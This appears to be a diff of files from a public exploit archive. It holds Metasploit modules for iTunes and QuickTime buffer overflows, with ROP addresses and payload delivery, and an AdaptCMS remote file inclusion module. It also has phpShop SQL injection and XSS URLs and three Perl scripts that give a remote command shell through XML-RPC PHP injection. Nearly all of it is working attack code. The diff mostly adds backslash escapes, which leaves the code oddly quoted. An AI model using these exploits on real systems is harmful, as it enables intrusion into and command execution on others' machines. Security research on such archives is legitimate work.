+					\'DisableNops\' => true,  # don\'t pad out the space.
-					'BadChars' => '',
+					\'BadChars\' => \'\',
 					# The encoder must be URL-safe otherwise it will be automatically
 					# URL encoded.
-					'EncoderType'   => Msf::Encoder::Type::AlphanumMixed,
+					\'EncoderType\'   => Msf::Encoder::Type::AlphanumMixed,
-					'EncoderOptions' =>
+					\'EncoderOptions\' =>
 						{
-							'BufferRegister' => 'ECX',  # See the comments below
+							\'BufferRegister\' => \'ECX\',  # See the comments below
-							'BufferOffset' => 3,  # See the comments below
+							\'BufferOffset\' => 3,  # See the comments below
 						},
 				},
-			'Targets'	=>
+			\'Targets\'	=>
 				[
 					[
-						'OS X',
+						\'OS X\',
 						{
-							'Platform'      => [ 'osx' ],
+							\'Platform\'      => [ \'osx\' ],
-							'Arch'          => ARCH_X86,
+							\'Arch\'          => ARCH_X86,
-							'Addr'          => 'ATe'
+							\'Addr\'          => \'ATe\'
 						},
 					]
 				],
-			'DisclosureDate' => 'Jun 01 2009',
+			\'DisclosureDate\' => \'Jun 01 2009\',
-			'DefaultTarget'  => 0))
+			\'DefaultTarget\'  => 0))
 	end
 	# Generate distribution script, which calls our payload using JavaScript.
@ -72,18 +72,18 @@ class Metasploit3 < Msf::Exploit::Remote
 		# itms:// or itmss:// can be used.  The trailing colon is used
 		# to start the attack.  All data after the colon is copied to the
 		# stack buffer.
-		itms_base_url = "itms://:"
+		itms_base_url = \"itms://:\"
 		itms_base_url << rand_text_alpha(268)  # Fill up the real buffer
 		itms_base_url << rand_text_alpha(16)   # $ebx, $esi, $edi, $ebp
-		itms_base_url << target['Addr']  # hullo there, jmp *%ecx!
+		itms_base_url << target[\'Addr\']  # hullo there, jmp *%ecx!
-		# The first '/' in the buffer will terminate the copy to the stack buffer.
+		# The first \'/\' in the buffer will terminate the copy to the stack buffer.
 		# In addition, $ecx will be left pointing to the last 6 bytes of the heap
 		# buffer containing the full URL.  However, if a colon and a ? occur after
 		# the value in ecx will point to that point in the heap buffer.  In our
 		# case, it will point to the beginning.  The ! is there to make the
 		# alphanumeric shellcode execute easily.  (This is why we need an offset
 		# of 3 in the payload).
-		itms_base_url << "/:!?"   # Truncate the stack buffer overflow and prep for payload
+		itms_base_url << \"/:!?\"   # Truncate the stack buffer overflow and prep for payload
 		itms_base_url << p # Wooooooo! Payload time.
 		# We drop on a few extra bytes as the last few bytes can sometimes be
 		# corrupted.
@ -93,31 +93,31 @@ class Metasploit3 < Msf::Exploit::Remote
 		# itms_base_url << Rex::Text.pattern_create(1024,
 		#                                           Rex::Text::DefaultPatternSets)
-		# Return back an example URL.  Using an iframe doesn't work with all
+		# Return back an example URL.  Using an iframe doesn\'t work with all
-		# browsers, but that's easy enough to fix if you need to.
+		# browsers, but that\'s easy enough to fix if you need to.
 		return String(<<-EOS)
 <html><head><title>iTunes loading . . .</title></head>
 <body>
-<script>document.location.assign("#{itms_base_url}");</script>
+<script>document.location.assign(\"#{itms_base_url}\");</script>
-<p>iTunes should open automatically, but if it doesn't, click to
+<p>iTunes should open automatically, but if it doesn\'t, click to
-<a href="#{itms_base_url}">continue</a>.</p>a
+<a href=\"#{itms_base_url}\">continue</a>.</p>a
 </body>
 </html>
 EOS
 	end
 	def on_request_uri(cli, request)
-		print_status("Generating payload...")
+		print_status(\"Generating payload...\")
 		return unless (p = regenerate_payload(cli))
-		#print_status("=> #{payload.encoded}")
+		#print_status(\"=> #{payload.encoded}\")
-		print_status("=> #{payload.encoded.length} bytes")
+		print_status(\"=> #{payload.encoded.length} bytes\")
-		print_status("Generating HTML container...")
+		print_status(\"Generating HTML container...\")
 		page = generate_itms_page(payload.encoded)
-		#print_status("=> #{page}")
+		#print_status(\"=> #{page}\")
-		print_status("Sending itms page to #{cli.peerhost}:#{cli.peerport}")
+		print_status(\"Sending itms page to #{cli.peerhost}:#{cli.peerport}\")
-		header = { 'Content-Type' => 'text/html' }
+		header = { \'Content-Type\' => \'text/html\' }
 		send_response_html(cli, page, header)
 		handler(cli)
 	end
--- a/platforms/osx/remote/16873.rb
+++ b/platforms/osx/remote/16873.rb
@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
-require 'msf/core'
+require \'msf/core\'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
@ -18,131 +18,131 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info = {})
 		super(update_info(info,
-			'Name' => 'MacOS X QuickTime RTSP Content-Type Overflow',
+			\'Name\' => \'MacOS X QuickTime RTSP Content-Type Overflow\',
 			# Description?
 			# Author?
-			'Version'  => '$Revision: 10617 $',
+			\'Version\'  => \'$Revision: 10617 $\',
-			'Platform' => 'osx',
+			\'Platform\' => \'osx\',
-			'References' =>
+			\'References\' =>
 				[
-					[ 'CVE', '2007-6166' ],
+					[ \'CVE\', \'2007-6166\' ],
-					[ 'OSVDB', '40876'],
+					[ \'OSVDB\', \'40876\'],
-					[ 'BID', '26549' ],
+					[ \'BID\', \'26549\' ],
 				],
-			'Payload' =>
+			\'Payload\' =>
 				{
-					'Space' => 3841,
+					\'Space\' => 3841,
-					'BadChars' => "\x00\x0a\x0d",
+					\'BadChars\' => \"\\x00\\x0a\\x0d\",
-					'MaxNops' => 0,
+					\'MaxNops\' => 0,
-					'StackAdjustment' => -3500,
+					\'StackAdjustment\' => -3500,
 				},
-			'Targets' =>
+			\'Targets\' =>
 				[
-					[ 'Mac OS X 10.4.0 PowerPC, QuickTime 7.0.0',
+					[ \'Mac OS X 10.4.0 PowerPC, QuickTime 7.0.0\',
 						{
-							'Arch' => ARCH_PPC,
+							\'Arch\' => ARCH_PPC,
-							'Ret' => 0x8fe3f88c,
+							\'Ret\' => 0x8fe3f88c,
-							'RetOffset' => 551,
+							\'RetOffset\' => 551,
-							'PayloadOffset' => 879
+							\'PayloadOffset\' => 879
 						}
 					],
-					[ 'Mac OS X 10.5.0 PowerPC, QuickTime 7.2.1',
+					[ \'Mac OS X 10.5.0 PowerPC, QuickTime 7.2.1\',
 						{
-							'Arch' => ARCH_PPC,
+							\'Arch\' => ARCH_PPC,
-							'Ret' => 0x8fe042e0,
+							\'Ret\' => 0x8fe042e0,
-							'RetOffset' => 615,
+							\'RetOffset\' => 615,
-							'PayloadOffset' => 3351
+							\'PayloadOffset\' => 3351
 						}
 					],
-					[ 'Mac OS X 10.4.8 x86, QuickTime 7.1.3',
+					[ \'Mac OS X 10.4.8 x86, QuickTime 7.1.3\',
 						{
-							'Arch' => ARCH_X86,
+							\'Arch\' => ARCH_X86,
-							'Offset' => 307,
+							\'Offset\' => 307,
-							'Writable' => 0xa0bd0f10,    # libSystem __IMPORT
+							\'Writable\' => 0xa0bd0f10,    # libSystem __IMPORT
 							# The rest of these are all in libSystem __TEXT
-							'ret' => 0x9015d336,
+							\'ret\' => 0x9015d336,
-							'poppopret' => 0x9015d334,
+							\'poppopret\' => 0x9015d334,
-							'setjmp' => 0x900bc438,
+							\'setjmp\' => 0x900bc438,
-							'strdup' => 0x90012f40,
+							\'strdup\' => 0x90012f40,
-							'jmp_eax' => 0x9014a77f
+							\'jmp_eax\' => 0x9014a77f
 						}
 					],
-					[ 'Mac OS X 10.5.0 x86, QuickTime 7.2.1',
+					[ \'Mac OS X 10.5.0 x86, QuickTime 7.2.1\',
 						{
-							'Arch' => ARCH_X86,
+							\'Arch\' => ARCH_X86,
-							'Offset' => 307,
+							\'Offset\' => 307,
-							'Writable' => 0x8fe66448,  # dyld __IMPORT
+							\'Writable\' => 0x8fe66448,  # dyld __IMPORT
 							# The rest of these addresses are in dyld __TEXT
-							'ret' => 0x8fe1ceee,
+							\'ret\' => 0x8fe1ceee,
-							'poppopret' => 0x8fe220d7,
+							\'poppopret\' => 0x8fe220d7,
-							'setjmp' => 0x8fe1ceb0,
+							\'setjmp\' => 0x8fe1ceb0,
-							'strdup' => 0x8fe1cd77,
+							\'strdup\' => 0x8fe1cd77,
-							'jmp_eax' => 0x8fe01041
+							\'jmp_eax\' => 0x8fe01041
 						}
 					],
 				],
-			'DefaultTarget'  => 2,
+			\'DefaultTarget\'  => 2,
-			'DisclosureDate' => 'Nov 23 2007'))
+			\'DisclosureDate\' => \'Nov 23 2007\'))
 	end
 	######
 	# XXX: This does not work on Tiger apparently
 	def make_exec_payload_from_heap_stub()
 		frag0 =
-			"\x90" + # nop
+			\"\\x90\" + # nop
-			"\x58" + # pop eax
+			\"\\x58\" + # pop eax
-			"\x61" + # popa
+			\"\\x61\" + # popa
-			"\xc3"   # ret
+			\"\\xc3\"   # ret
 		frag1 =
-			"\x90" +             # nop
+			\"\\x90\" +             # nop
-			"\x58" +             # pop eax
+			\"\\x58\" +             # pop eax
-			"\x89\xe0" +         # mov eax, esp
+			\"\\x89\\xe0\" +         # mov eax, esp
-			"\x83\xc0\x0c" +     # add eax, byte +0xc
+			\"\\x83\\xc0\\x0c\" +     # add eax, byte +0xc
-			"\x89\x44\x24\x08" + # mov [esp+0x8], eax
+			\"\\x89\\x44\\x24\\x08\" + # mov [esp+0x8], eax
-			"\xc3"               # ret
+			\"\\xc3\"               # ret
-		setjmp = target['setjmp']
+		setjmp = target[\'setjmp\']
-		writable = target['Writable']
+		writable = target[\'Writable\']
-		strdup = target['strdup']
+		strdup = target[\'strdup\']
-		jmp_eax = target['jmp_eax']
+		jmp_eax = target[\'jmp_eax\']
 		exec_payload_from_heap_stub =
 			frag0 +
-			[setjmp].pack('V') +
+			[setjmp].pack(\'V\') +
-			[writable + 32, writable].pack("V2") +
+			[writable + 32, writable].pack(\"V2\") +
 			frag1 +
-			"X" * 20 +
+			\"X\" * 20 +
-			[setjmp].pack('V') +
+			[setjmp].pack(\'V\') +
-			[writable + 24, writable, strdup, jmp_eax].pack("V4") +
+			[writable + 24, writable, strdup, jmp_eax].pack(\"V4\") +
-			"X" * 4
+			\"X\" * 4
 	end
 	def on_client_connect(client)
-		print_status("Got client connection...")
+		print_status(\"Got client connection...\")
-		if (target['Arch'] == ARCH_PPC)
+		if (target[\'Arch\'] == ARCH_PPC)
-			ret_offset = target['RetOffset']
+			ret_offset = target[\'RetOffset\']
-			payload_offset = target['PayloadOffset']
+			payload_offset = target[\'PayloadOffset\']
 			# Create pattern sized up to payload, since it always follows
 			# the return address.
 			boom = Rex::Text.pattern_create(payload_offset)
-			boom[ret_offset, 4] = [target['Ret']].pack('N')
+			boom[ret_offset, 4] = [target[\'Ret\']].pack(\'N\')
 			boom[payload_offset, payload.encoded.length] = payload.encoded
 		else
 			boom = Rex::Text.pattern_create(327)
-			boom[307, 4] = [target['ret']].pack('V')
+			boom[307, 4] = [target[\'ret\']].pack(\'V\')
-			boom[311, 4] = [target['ret']].pack('V')
+			boom[311, 4] = [target[\'ret\']].pack(\'V\')
-			boom[315, 4] = [target['poppopret']].pack('V')
+			boom[315, 4] = [target[\'poppopret\']].pack(\'V\')
-			boom[319, 4] = [target['Writable']].pack('V')
+			boom[319, 4] = [target[\'Writable\']].pack(\'V\')
-			boom[323, 4] = [target['Writable']].pack('V')
+			boom[323, 4] = [target[\'Writable\']].pack(\'V\')
 			#
 			# Create exec-payload-from-heap-stub, but split it in two.
@ -160,23 +160,23 @@ class Metasploit3 < Msf::Exploit::Remote
 			boom += payload.encoded
 		end
-		body = " "
+		body = \" \"
 		header =
-			"RTSP/1.0 200 OK\r\n"+
+			\"RTSP/1.0 200 OK\\r\\n\"+
-			"CSeq: 1\r\n"+
+			\"CSeq: 1\\r\\n\"+
-			"Content-Type: #{boom}\r\n"+
+			\"Content-Type: #{boom}\\r\\n\"+
-			"Content-Length: #{body.length}\r\n\r\n"
+			\"Content-Length: #{body.length}\\r\\n\\r\\n\"
-		print_status("Sending RTSP response...")
+		print_status(\"Sending RTSP response...\")
 		client.put(header + body)
-		print_status("Sleeping...")
+		print_status(\"Sleeping...\")
 		select(nil,nil,nil,1)
-		print_status("Starting handler...")
+		print_status(\"Starting handler...\")
 		handler(client)
-		print_status("Closing client...")
+		print_status(\"Closing client...\")
 		service.close_client(client)
 	end
 end
--- a/platforms/php/webapps/10324.txt
+++ b/platforms/php/webapps/10324.txt
@ -7,21 +7,21 @@ Web: http://www.andreafabrizi.it
 ### SQL INJECTION
-http://server/phpshop-0.8.1/?page=admin/function_list&module_id=111111' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- aaa
+http://server/phpshop-0.8.1/?page=admin/function_list&module_id=111111\' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- aaa
-http://server/phpshop-0.8.1/?page=shop/flypage&product_id=1011'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5 -- aaa
+http://server/phpshop-0.8.1/?page=shop/flypage&product_id=1011\'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5 -- aaa
-http://server/phpshop-0.8.1/?page=vendor/vendor_form&vendor_id=1' and '1'='1
+http://server/phpshop-0.8.1/?page=vendor/vendor_form&vendor_id=1\' and \'1\'=\'1
-http://server/phpshop-0.8.1/?page=admin/module_form&module_id=1' and '1'='1
+http://server/phpshop-0.8.1/?page=admin/module_form&module_id=1\' and \'1\'=\'1
-http://server/phpshop-0.8.1/?page=admin/user_form&user_id=7322f75cc7ba16db1799fd8d25dbcde4' and '1'='1
+http://server/phpshop-0.8.1/?page=admin/user_form&user_id=7322f75cc7ba16db1799fd8d25dbcde4\' and \'1\'=\'1
-http://server/phpshop-0.8.1/?page=vendor/vendor_category_form&vendor_category_id=6' and '1'='1
+http://server/phpshop-0.8.1/?page=vendor/vendor_category_form&vendor_category_id=6\' and \'1\'=\'1
-http://server/phpshop-0.8.1/?page=store/user_form&user_id=c88ce1c0ad365513d6fe085a8aacaebc' and '1'='1
+http://server/phpshop-0.8.1/?page=store/user_form&user_id=c88ce1c0ad365513d6fe085a8aacaebc\' and \'1\'=\'1
-http://server/phpshop-0.8.1/?page=store/payment_method_form&payment_method_id=1' and '1'='1
+http://server/phpshop-0.8.1/?page=store/payment_method_form&payment_method_id=1\' and \'1\'=\'1
-http://server/phpshop-0.8.1/?page=tax/tax_form&tax_rate_id=2' and '1'='1
+http://server/phpshop-0.8.1/?page=tax/tax_form&tax_rate_id=2\' and \'1\'=\'1
 ...and many others...
 The SQL Injection security check can be bypassed replacing spaces with comments (/**/)
 ### BLIND SQL INJECTION
-http://server/phpshop-0.8.1/?page=shop/browse&category=aaa' and 1=1 -- aaa
+http://server/phpshop-0.8.1/?page=shop/browse&category=aaa\' and 1=1 -- aaa
 ### CSRF
@ -30,5 +30,5 @@ http://server/phpshop-0.8.1/?page=shop/cart&func=cartAdd&product_id=321&
 ### XSS
-http://server/phpshop-0.8.1/?page=order/order_print&order_id=1"><script>alert(document.cookie);</script>
+http://server/phpshop-0.8.1/?page=order/order_print&order_id=1\"><script>alert(document.cookie);</script>
 ...and many others...
--- a/platforms/php/webapps/1078.pl
+++ b/platforms/php/webapps/1078.pl
@ -22,41 +22,41 @@ $| = 1;  # fflush stdout after print
 # Default options
 # connection 
-my $basic_auth_user = '';
+my $basic_auth_user = \'\';
-my $basic_auth_pass = '';
+my $basic_auth_pass = \'\';
-my $proxy = '';
+my $proxy = \'\';
-my $proxy_user = '';
+my $proxy_user = \'\';
-my $proxy_pass = '';
+my $proxy_pass = \'\';
 my $conn_timeout = 15;
 # general
 my $host;
 #informational lines to feed my own ego.
- print "xmlrpc exploit - http://www.reversing.org \n";
+ print \"xmlrpc exploit - http://www.reversing.org \\n\";
- print "2005 ilo-- <ilo".chr(64)."reversing.org> \n";
+ print \"2005 ilo-- <ilo\".chr(64).\"reversing.org> \\n\";
- print "special chars allowed are / and - \n\n";
+ print \"special chars allowed are / and - \\n\\n\";
 # read command line options
 my $options = GetOptions (
 #general options
- 'host=s'    => \$host, # input host to test.
+ \'host=s\'    => \\$host, # input host to test.
 # connection options
- 'basic_auth_user=s' => \$basic_auth_user,
+ \'basic_auth_user=s\' => \\$basic_auth_user,
- 'basic_auth_pass=s' => \$basic_auth_pass,
+ \'basic_auth_pass=s\' => \\$basic_auth_pass,
- 'proxy=s'           => \$proxy,
+ \'proxy=s\'           => \\$proxy,
- 'proxy_user=s'      => \$proxy_user,
+ \'proxy_user=s\'      => \\$proxy_user,
- 'proxy_pass=s'      => \$proxy_pass,
+ \'proxy_pass=s\'      => \\$proxy_pass,
- 'timeout=i'         => \$conn_timeout);
+ \'timeout=i\'         => \\$conn_timeout);
 # command line sanity check 
 &show_usage unless ($host);
 # main loop 
 while (1){
- 	print "\nxmlrpc@# ";
+ 	print \"\\nxmlrpc@# \";
 	my $cmd = <STDIN>;
 	xmlrpc_xploit ($cmd);
 }
@ -68,25 +68,25 @@ sub xmlrpc_xploit {
 chomp (my $data = shift);
 my $reply;
-my $d1 = "<?xml version=\"1.0\"?><methodCall><methodName>examples.getStateName</methodName><params><param><name>a');";  
+my $d1 = \"<?xml version=\\\"1.0\\\"?><methodCall><methodName>examples.getStateName</methodName><params><param><name>a\');\";  
-my $d2 = ";//</name><value>xml exploit R/01</value></param></params></methodCall>";
+my $d2 = \";//</name><value>xml exploit R/01</value></param></params></methodCall>\";
-  $data =~ s/-/'.chr(45).'/mg;
+  $data =~ s/-/\'.chr(45).\'/mg;
-  $data =~ s/\//'.char(47).'/mg;
+  $data =~ s/\\//\'.char(47).\'/mg;
-  my $req = new HTTP::Request 'POST' => $host;
+  my $req = new HTTP::Request \'POST\' => $host;
-  $req->content_type('application/xml');
+  $req->content_type(\'application/xml\');
-  $req->content($d1.'system(\''.$data.'\')'.$d2);
+  $req->content($d1.\'system(\\\'\'.$data.\'\\\')\'.$d2);
  my $ua = new LWP::UserAgent;
-  $ua->agent("xmlrpc exploit R/0.1");
+  $ua->agent(\"xmlrpc exploit R/0.1\");
  $ua->timeout($conn_timeout);
  if ($basic_auth_user){
    $req->authorization_basic($basic_auth_user, $basic_auth_pass) 
  }
  if ($proxy){
-    $ua->proxy(['http'] => $proxy);
+    $ua->proxy([\'http\'] => $proxy);
    $req->proxy_authorization_basic($proxy_user, $proxy_pass);
  }
@ -95,7 +95,7 @@ my $d2 = ";//</name><value>xml exploit R/01</value></param></params></methodCall
  if ($res->is_success){
     $reply= $res->content;
  } else { 
-     $reply = "";
+     $reply = \"\";
  }
  $reply =~ /(.*).(<pre>warning.*)/mgsi;
  print ($1);
@ -103,15 +103,15 @@ my $d2 = ";//</name><value>xml exploit R/01</value></param></params></methodCall
 # show options 
 sub show_usage {
-  print "Syntax: ./xmlrpc.pl [options] host/uri\n\n";
+  print \"Syntax: ./xmlrpc.pl [options] host/uri\\n\\n\";
-  print "main options\n";
+  print \"main options\\n\";
-  print "connection options\n";
+  print \"connection options\\n\";
-  print "\t--proxy (http), --proxy_user, --proxy_pass\n";
+  print \"\\t--proxy (http), --proxy_user, --proxy_pass\\n\";
-  print "\t--basic_auth_user, --basic_auth_pass\n";
+  print \"\\t--basic_auth_user, --basic_auth_pass\\n\";
-  print "\t--timeout \n";
+  print \"\\t--timeout \\n\";
-  print "\nExample\n";
+  print \"\\nExample\\n\";
-  print "bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \n";
+  print \"bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \\n\";
-  print "\n";
+  print \"\\n\";
  exit(1);
 }
--- a/platforms/php/webapps/1083.pl
+++ b/platforms/php/webapps/1083.pl
@ -2,16 +2,16 @@
 #                     /|                                #       
 #                    | |                                #      
 #                    | |                                #      
-#       /\   ________| |___                             #       
+#       /\\   ________| |___                             #       
-#      /  \  \_______   __/                             #
+#      /  \\  \\_______   __/                             #
-#     /    \|\_____  | | _       _  _     _  ()___      #      
+#     /    \\|\\_____  | | _       _  _     _  ()___      #      
-#    /  /\  \  ___ \ | |<_>  /  |  |  | || \ || | | |   #       
+#    /  /\\  \\  ___ \\ | |<_>  /  |  |  | || \\ || | | |   #       
-#   /  /__\  \|   \ || | _  /__ |_ |  | ||_/ || | |_|   #       
+#   /  /__\\  \\|   \\ || | _  /__ |_ |  | ||_/ || | |_|   #       
-#  /  ______  \   | || || |   / |  |  | || \ || |   |   #       
+#  /  ______  \\   | || || |   / |  |  | || \\ || |   |   #       
-# /  /      \  \  | || || |  /  |_ |_ |_||  \|| | \_|   #       
+# /  /      \\  \\  | || || |  /  |_ |_ |_||  \\|| | \\_|   #       
-# \_/       |\_/  | || || | ___ _  _                    #       
+# \\_/       |\\_/  | || || | ___ _  _                    #       
-#           | |   | || /| |  | |  | ||\/|               #       
+#           | |   | || /| |  | |  | ||\\/|               #       
-#            \|    \||/  \|  | |_ |_||  |               #       
+#            \\|    \\||/  \\|  | |_ |_||  |               #       
 #                            | |  | ||  |               #       
 #                            | |_ | ||  |               #       
 #                                                       #
@ -24,36 +24,36 @@
 use IO::Socket;
-print "XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\n";
+print \"XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\\n\";
 if ($ARGV[0] && $ARGV[1])
 {
 $host = $ARGV[0];
 $xml = $ARGV[1];
- $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "connecterror\n";
+ $sock = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$host\", PeerPort => \"80\") || die \"connecterror\\n\";
 while (1) {
-    print '['.$host.']# ';
+    print \'[\'.$host.\']# \';
    $cmd = <STDIN>;
    chop($cmd);
-    last if ($cmd eq 'exit');
+    last if ($cmd eq \'exit\');
-    $xmldata = "<?xml version=\"1.0\"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_\n';echo `".$cmd."`;echo '_end_';exit;/*</name></value></param></params></methodCall>";
+    $xmldata = \"<?xml version=\\\"1.0\\\"?><methodCall><methodName>test.method</methodName><params><param><value><name>\',\'\'));echo \'_begin_\\n\';echo `\".$cmd.\"`;echo \'_end_\';exit;/*</name></value></param></params></methodCall>\";
-    print $sock "POST ".$xml." HTTP/1.1\n";
+    print $sock \"POST \".$xml.\" HTTP/1.1\\n\";
-    print $sock "Host: ".$host."\n";
+    print $sock \"Host: \".$host.\"\\n\";
-    print $sock "Content-Type: text/xml\n";
+    print $sock \"Content-Type: text/xml\\n\";
-    print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata;
+    print $sock \"Content-Length:\".length($xmldata).\"\\n\\n\".$xmldata;
    $good=0;
    while ($ans = <$sock>)
       {
-        if ($good == 1) { print "$ans"; }
+        if ($good == 1) { print \"$ans\"; }
        last if ($ans =~ /^_end_/);
        if ($ans =~ /^_begin_/) { $good = 1; }
       }
-      if ($good==0) {print "Exploit Failed\n";exit();}
+      if ($good==0) {print \"Exploit Failed\\n\";exit();}
   }
 }
 else {
- print "Usage: perl xml.pl [host] [path_to_xmlrpc]\n\n";
+ print \"Usage: perl xml.pl [host] [path_to_xmlrpc]\\n\\n\";
- print "Example: perl xml.pl target.com /script/xmlrpc.php\n";
+ print \"Example: perl xml.pl target.com /script/xmlrpc.php\\n\";
 exit;
 }
--- a/platforms/php/webapps/1084.pl
+++ b/platforms/php/webapps/1084.pl
@ -10,35 +10,35 @@
 use LWP::UserAgent;
 $brws = new LWP::UserAgent;
-$brws->agent("Internet Explorer 6.0");
+$brws->agent(\"Internet Explorer 6.0\");
 $host = $ARGV[0]; 
 if ( !$host ) 
 { 
-	die("Usage: xmlrpcexec.pl http://pathto/xmlrpcserver"); 
+	die(\"Usage: xmlrpcexec.pl http://pathto/xmlrpcserver\"); 
 }
 while ( $host ) 
 {
-	print "xmlrpc\@\#";
+	print \"xmlrpc\\@\\#\";
 	$exec = <STDIN>;	
-	$data = "<?xml version=\"1.0\"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>','')); system('$exec'); die; /*</name></value></param></params></methodCall>";
+	$data = \"<?xml version=\\\"1.0\\\"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>\',\'\')); system(\'$exec\'); die; /*</name></value></param></params></methodCall>\";
 	$send = new HTTP::Request POST => $host;
 	$send->content($data);
 	$gots = $brws->request($send);	
 	$show = $gots->content;
-	if ( $show =~ /<b>([\d]{1,10})<\/b><br \/>(.*)/is )
+	if ( $show =~ /<b>([\\d]{1,10})<\\/b><br \\/>(.*)/is )
 	{
-	    print $2 . "\n";
+	    print $2 . \"\\n\";
 	}
 	else
 	{
-		print "$show\n";
+		print \"$show\\n\";
 	}
--- a/platforms/php/webapps/15237.rb
+++ b/platforms/php/webapps/15237.rb
@ -1,12 +1,12 @@
 ##
 #      )   )            )                     (   (         (   (    (       )     ) 
-#  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
+#  ( /(( /( (       ( /(  (       (    (     )\\ ))\\ )      )\\ ))\\ ) )\\ ) ( /(  ( /( 
-#  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
+#  )\\())\\()))\\ )    )\\()) )\\      )\\   )\\   (()/(()/(  (  (()/(()/((()/( )\\()) )\\())
-# ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
+# ((_)((_)\\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\\  /(_))(_))/(_))(_)\\|((_)\\ 
-#__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
+#__ ((_)((_)/(_))___ ((_)\\ _ )\\ )\\___)\\ _ )\\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
-#\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
+#\\ \\ / / _ (_)) __\\ \\ / (_)_\\(_)(/ __(_)_\\(_) _ \\|   \\| __| _ \\ |  |_ _|| \\| | |/ / 
-# \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
+# \\ V / (_) || (_ |\\ V / / _ \\  | (__ / _ \\ |   /| |) | _||   / |__ | | | .` | \' <  
-#  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
+#  |_| \\___/  \\___| |_| /_/ \\_\\  \\___/_/ \\_\\|_|_\\|___/|___|_|_\\____|___||_|\\_|_|\\_\\
 #										.WEB.ID
 ##
@ -17,7 +17,7 @@
 # http://metasploit.com/framework/
 ##
-require 'msf/core'
+require \'msf/core\'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
@ -28,53 +28,53 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'AdaptCMS 2.0.1 Beta Released Remote File Inclusion Exploit',
+			\'Name\'           => \'AdaptCMS 2.0.1 Beta Released Remote File Inclusion Exploit\',
-			'Description'    => %q{
+			\'Description\'    => %q{
 					This module can be used to exploit Remote File Inclusion in AdaptCMS 2.0.1 or earlier in file /inc/smarty/libs/init.php.
 			},
-			'Author'         => [ 'v3n0m' , 'Yogyacarderlink-Indonesia' ],
+			\'Author\'         => [ \'v3n0m\' , \'Yogyacarderlink-Indonesia\' ],
-			'License'        => MSF_LICENSE,
+			\'License\'        => MSF_LICENSE,
-			'Version'        => '$Revision:$',
+			\'Version\'        => \'$Revision:$\',
-			'References'     => 				
+			\'References\'     => 				
 				[
-					[ 'CVE', '2010-2618' ],
+					[ \'CVE\', \'2010-2618\' ],
-					[ 'BID', '41116' ],
+					[ \'BID\', \'41116\' ],
 				],
-			'Privileged'     => false,
+			\'Privileged\'     => false,
-			'Payload'        =>
+			\'Payload\'        =>
 				{
-					'DisableNops' => true,
+					\'DisableNops\' => true,
-					'Compat'      =>
+					\'Compat\'      =>
 						{
-							'ConnectionType' => 'find',
+							\'ConnectionType\' => \'find\',
 						},
-					'Space'       => 262144, # 256k
+					\'Space\'       => 262144, # 256k
 				},
-			'Platform'       => 'php',
+			\'Platform\'       => \'php\',
-			'Arch'           => ARCH_PHP,
+			\'Arch\'           => ARCH_PHP,
-			'Targets'        => [[ 'Automatic', { }]],
+			\'Targets\'        => [[ \'Automatic\', { }]],
-			'DisclosureDate' => 'Oct 12 2010',
+			\'DisclosureDate\' => \'Oct 12 2010\',
-			'DefaultTarget' => 0))
+			\'DefaultTarget\' => 0))
 		register_options([
-			OptString.new('PHPURI', [ true , "The URI to request, with the include parameter changed to !URL!", '/inc/smarty/libs/init.php?sitepath=!URL!']),
+			OptString.new(\'PHPURI\', [ true , \"The URI to request, with the include parameter changed to !URL!\", \'/inc/smarty/libs/init.php?sitepath=!URL!\']),
 			], self.class)
 	end
 	def php_exploit
 		timeout = 0.01
-		uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
+		uri = datastore[\'PHPURI\'].gsub(\'!URL!\', Rex::Text.to_hex(php_include_url, \"%\"))
-		print_status("Trying uri #{uri}")
+		print_status(\"Trying uri #{uri}\")
 		response = send_request_raw( {
-				'global' => true,
+				\'global\' => true,
-				'uri' => uri,
+				\'uri\' => uri,
 			},timeout)
 		if response and response.code != 200
-			print_error("Server returned non-200 status code (#{response.code})")
+			print_error(\"Server returned non-200 status code (#{response.code})\")
 		end
 		handler
--- a/platforms/php/webapps/16882.rb
